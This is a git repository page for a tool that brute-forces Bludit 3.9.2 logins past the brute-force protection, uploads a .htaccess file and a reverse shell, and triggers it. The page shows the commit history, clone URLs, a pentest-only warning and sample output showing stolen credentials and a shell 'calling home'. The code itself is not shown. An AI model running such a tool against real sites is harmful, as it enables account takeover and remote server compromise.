~nighthawk/bludit-3.9.2-brute-exploit

bludit 3.9.2 bruteforce bypasser and reverse shell uploader
33ec4fac — Frank Brodbeck 3 months ago
script will now bruteforce and exploit bludit for uploading a reverse shell and trigger it
1986c7d3 — Musyoka Ian 4 months ago
Create bruteforce.py
02dd533a — Musyoka Ian 4 months ago
Initial commit

refs

master
browse  log 

clone

read-only
https://git.sr.ht/~nighthawk/bludit-3.9.2-brute-exploit
read/write
git@git.sr.ht:~nighthawk/bludit-3.9.2-brute-exploit

You can also use your local clone with git send-email.

Modified version of https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script

DO NOT USE THIS ON ENVIRONMENTS YOU ARE NOT ALLOWED TO PENTEST

The script takes new parameters:

  • a list of usernames to bruteforce
  • a shell to upload
nighthawk@attacker:~$ ./bruteforce.py 

[*] Attacking bludit @ http://198.51.100.1
[+] Starting bruteforce
[-] Trying: RolandDeschain
[-] SUCCESS: johndoe with password s3cr3t
[+] Starting exploitation
[-] Uploading .htaccess
[-] Dropping shell
[-] Calling home
[!] Thank you for flying with nighthawk.